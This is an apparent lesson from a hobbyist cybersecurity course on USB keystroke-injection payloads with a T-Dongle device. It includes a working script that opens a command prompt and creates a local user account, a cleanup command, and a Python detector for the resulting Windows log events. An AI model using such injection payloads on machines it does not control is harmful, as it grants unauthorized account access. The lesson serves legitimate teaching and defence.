Month 5 Box - Cyber Security

Lesson 6 - Advanced USB Ducky Payloads

Lesson 6: Advanced Payloads with T-Dongle (USB Army Knife)


Now that you’ve mastered the basics of USB HID injection, this lesson dives deeper into advanced payloads using the T-Dongle S3 and USB Army Knife firmware. You’ll learn how attackers use these techniques to execute system-level commands—and why it's so important to understand them from a defensive and ethical perspective.


🎯 What You’ll Learn:


By the end of this session, you will:


  • Write advanced HID payloads that trigger command-line and PowerShell actions
  • Simulate automated phishing-like payloads (for educational use only)
  • Safely test and clean up payloads on your own offline system
  • Understand the real-world risks of HID tools and your responsibilities as an ethical hacker


⚙️ Step 1 – Advanced HID Payload Capabilities


Here are examples of actions HID injection tools can perform within seconds:


  • Create a new local user with net user
  • Launch PowerShell and execute simple scripts
  • Open a web browser to a targeted URL to simulate phishing behavior


🧠 Reminder: All payloads must be used only on machines you own or have permission to test on.


These examples are often used in real-world attacks, from ransomware delivery to data exfiltration. Understanding these techniques gives you insight into how to defend against them.


🧪 Hands-On Activity: Educational Payload


Let’s build and test a real example on your machine:


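REM Open the Run dialog and start a Command Prompt
GUI r
DELAY 500
STRING cmd
ENTER
REM Wait for the window to open, then create the local test account
DELAY 500
STRING net user testuser password123 /add
ENTER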


Upload this script using the USB Army Knife web interface, then run it on your device.


To clean up afterward, run:


net user testuser /delete
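
From the defender's side, this test leaves a trail in the Windows Security log. The Python example below is added here and is not part of the original lesson: it assumes the events were exported into dictionaries that use the log's own field names (EventID, TimeCreated, CommandLine, TargetUserName), flags any net user ... /add command line, and reports accounts that were created but never deleted. The sample records are constructed.

```python
import re

# Windows Security log event IDs (logged only when the matching audit policy is on)
PROCESS_CREATED = 4688   # "A new process has been created"
ACCOUNT_CREATED = 4720   # "A user account was created"
ACCOUNT_DELETED = 4726   # "A user account was deleted"

# "net user <name> ... /add", also matching net.exe / net1.exe and any letter case
NET_USER_ADD = re.compile(r"\bnet1?(?:\.exe)?\s+user\s+(\S+).*?/add\b", re.I)

def review(events):
    """Return (flagged account-creation commands, accounts created but not deleted)."""
    flagged, live = [], set()
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        if ev["EventID"] == PROCESS_CREATED:
            # CommandLine is empty unless command-line auditing is enabled
            match = NET_USER_ADD.search(ev.get("CommandLine", ""))
            if match:
                flagged.append((ev["TimeCreated"], match.group(1)))
        elif ev["EventID"] == ACCOUNT_CREATED:
            live.add(ev["TargetUserName"].lower())
        elif ev["EventID"] == ACCOUNT_DELETED:
            live.discard(ev["TargetUserName"].lower())
    return flagged, sorted(live)

# Constructed sample records for the lesson's test: payload run, then cleanup
SAMPLE = [
    {"EventID": 4688, "TimeCreated": "2024-01-01T10:00:01", "CommandLine": "cmd"},
    {"EventID": 4688, "TimeCreated": "2024-01-01T10:00:02",
     "CommandLine": "net user testuser password123 /add"},
    {"EventID": 4720, "TimeCreated": "2024-01-01T10:00:02", "TargetUserName": "testuser"},
    {"EventID": 4688, "TimeCreated": "2024-01-01T10:05:00",
     "CommandLine": "net user testuser /delete"},
    {"EventID": 4726, "TimeCreated": "2024-01-01T10:05:00", "TargetUserName": "testuser"},
]

if __name__ == "__main__":
    flagged, leftover = review(SAMPLE)
    print("account-creation commands:", flagged)
    print("accounts still present:", leftover or "none")
```

An empty "accounts still present" list means the cleanup step was recorded; a name left in it means the test account still exists.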


💡 Bonus Activity:


Try building a PowerShell script that displays a simple message:


REM Open the Run dialog and start PowerShell
GUI r
DELAY 500
STRING powershell
ENTER
REM Wait for the window to open, then print a message
DELAY 500
STRING Write-Host 'Hello from T-Dongle!'
ENTER


Use this to explore scripting safely and learn how different command shells respond to HID automation.


⚖️ Legal Note (Part 2):


This lesson demonstrates tools that could be used maliciously—but you are learning to use them responsibly.


Never deploy these payloads in school, work, or public environments.

Never test on systems you don’t fully control.

Always clean up after testing and keep your activities ethical and legal.

🔒 The video includes real-world headlines about misused HID attacks with an on-screen warning:


“This is why we learn responsibly. DO NOT misuse this knowledge.”


📚 Homework Assignment:


  • Create your own safe, advanced payload. Example ideas:
      • Open Notepad, Calculator, and a website in sequence
      • Launch a shell and print system info
  • Document what it does and why it works
  • Share your best creation in the #advanced-payloads thread on Discord


✅ By the End of This Lesson, You’ll Have:


  • Understood how attackers use HID automation to manipulate systems
  • Written, deployed, and cleaned up an advanced payload
  • Strengthened your understanding of how to test and defend responsibly


In Lesson 7, we’ll move into wireless hacking territory with the T-Embed (Flipper clone)—opening up exciting learning opportunities around RFID, Bluetooth, and more.